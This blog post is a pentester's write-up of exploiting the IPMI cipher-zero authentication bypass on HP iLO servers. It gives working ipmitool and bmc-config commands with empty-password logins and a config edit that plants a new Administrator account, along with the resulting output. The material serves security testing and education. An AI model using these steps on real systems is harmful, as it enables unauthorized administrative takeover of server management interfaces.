Monday, December 8, 2014

Attacking IPMI Cipher 0

During a pentest last month I ran into something new to me. Nessus returned with a "IPMI Cipher Suite Zero Authentication Bypass" on several HP iLO servers. I didn't find a lot of research online so I thought I would share my experience with it. I did end up finding another blog here, which is a great resource as well. Obvious first question, what the heck does that mean? To Wikipedia!!

"The Intelligent Platform Management Interface is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell."

Hmmmm access to "out-of-band management" always sounds good during a pentest! Now what about this "Cipher Suite Zero" part? Nessus helped out here -
"...which permits logon as an administrator without requiring a password".
Well that just sounds excellent! Now in my case, I was interested in gaining administrator access to the HP iLO web server interface. Although the IPMI interface would me allow me to login without a password, this did not translate up to the web interface. So I wanted to leverage this to add my own administrator account. There are free tools available for linux which can communicate with the IPMI interface. So first step was to install these tools, which I did on my Kali VM. 

 
sudo apt-get install freeipmi-tools

Using these tools, it was actually quite simple to accomplish my goal, with just a few commands. The first command list the users and there privileges on the box. We do this by supplying the credentials of Administrator and empty string for the password while using the "ipmitool". For obvious reasons I have scrubbed all the users names form the output below, only leaving Administrator, the default account. 
 
ipmitool -I lanplus -C 0 -H IP_ADDRESS -U Administrator -P ""  user list


ID  Name      Callin  Link Auth IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   (Empty User)     true    false      false      NO ACCESS
3   (Empty User)     true    false      false      NO ACCESS
4   (Empty User)     true    false      false      NO ACCESS
5   (Empty User)     true    false      false      NO ACCESS
6   (Empty User)     true    false      false      NO ACCESS
7   (Empty User)     true    false      false      NO ACCESS
8   (Empty User)     true    false      false      NO ACCESS
9   (Empty User)     true    false      false      NO ACCESS
10  (Empty User)     true    false      false      NO ACCESS
11  (Empty User)     true    false      false      NO ACCESS
12  (Empty User)     true    false      false      NO ACCESS

Great, this shows that we can actually make a valid connection and did show other user accounts. Now to add my own user I need to make a change to the config file on the system. Lets first take a look at the current config file to understand what it looks like and to also make a backup for the client. 
 
bmc-config -D LAN_2_0 -I 0 -v -u Administrator -p "" -h IP_ADDRESS -o -f

The above command will log into the machine and download the config file. This may take some time depending on your network. If you take some time and examine the config file which has been downloaded, it is very easy to see how to add a user. Below is a before and after snip of the config file I was using. 
 


Original

...

Section User2
        ## Give Username
        Username                                      (Empty User)
        ## Give password or blank to clear. MAX 16 chars (20 chars if IPMI 2.0 supported).
        ## Password
        ## Possible values: Yes/No or blank to not set
        Enable_User                                   No
        ## Possible values: Yes/No
        Lan_Enable_IPMI_Msgs                          No
        ## Possible values: Yes/No
        Lan_Enable_Link_Auth                          No
        ## Possible values: Yes/No
        Lan_Enable_Restricted_to_Callback             No
        ## Possible values: Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
        Lan_Privilege_Limit                           No_Access
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Lan_Session_Limit
        ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
        ## Serial_Session_Limit
EndSection
...

After

...

Section User2
       ## Give Username
       Username                                      AdminUser
       ## Give password or blank to clear. MAX 16 chars (20 chars if IPMI 2.0 supported).
       Password                              P@$$w0rd
       ## Possible values: Yes/No or blank to not set
       Enable_User                                   Yes
       ## Possible values: Yes/No
       Lan_Enable_IPMI_Msgs                          Yes
       ## Possible values: Yes/No
       Lan_Enable_Link_Auth                          Yes
       ## Possible values: Yes/No
       Lan_Enable_Restricted_to_Callback             No
       ## Possible values: Callback/User/Operator/Administrator/OEM_Proprietary/No_Access
       Lan_Privilege_Limit                           Administrator
       ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
       ## Lan_Session_Limit
       ## Possible values: 0-17, 0 is unlimited; May be reset to 0 if not specified
       ## Serial_Session_Limit
EndSection

...

You want to choose a spot in the config file that is labeled for an (Empty User), otherwise when you push the new config you will overwrite the preexisting users. Also you may notice I used a someone stronger password. In my case my goal is to get into the web server. I did this since I am unaware if there is a password policy in place. Lastly time, to upload the config file. 
 

bmc-config -D LAN_2_0 -I 0 -v -u Administrator -p "" -h IP_ADDRESS --commit -f 
ERROR: Failed to commit `User2:Lan_Enable_Link_Auth': Invalid/Unsupported Config

You will notice I got an error, however lets check the user list again just to make sure if failed. 
 
ipmitool -I lanplus -C 0 -H IP_ADDRESS -U Administrator -P ""  user list


ID  Name      Callin  Link Auth IPMI Msg   Channel Priv Limit
1   Administrator    true    false      true       ADMINISTRATOR
2   AdminUser        true    false      true       ADMINISTRATOR
3   (Empty User)     true    false      false      NO ACCESS
4   (Empty User)     true    false      false      NO ACCESS
5   (Empty User)     true    false      false      NO ACCESS
6   (Empty User)     true    false      false      NO ACCESS
7   (Empty User)     true    false      false      NO ACCESS
8   (Empty User)     true    false      false      NO ACCESS
9   (Empty User)     true    false      false      NO ACCESS
10  (Empty User)     true    false      false      NO ACCESS
11  (Empty User)     true    false      false      NO ACCESS
12  (Empty User)     true    false      false      NO ACCESS

Well look at that it worked anyway! I am not sure why that error is thrown, but upon further investigation I can now log into the web server page without a problem as well. Normally I like to chase down all errors regardless, but in this situation during a pentest it was unimportant. So there it is, another successful hack for the books.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)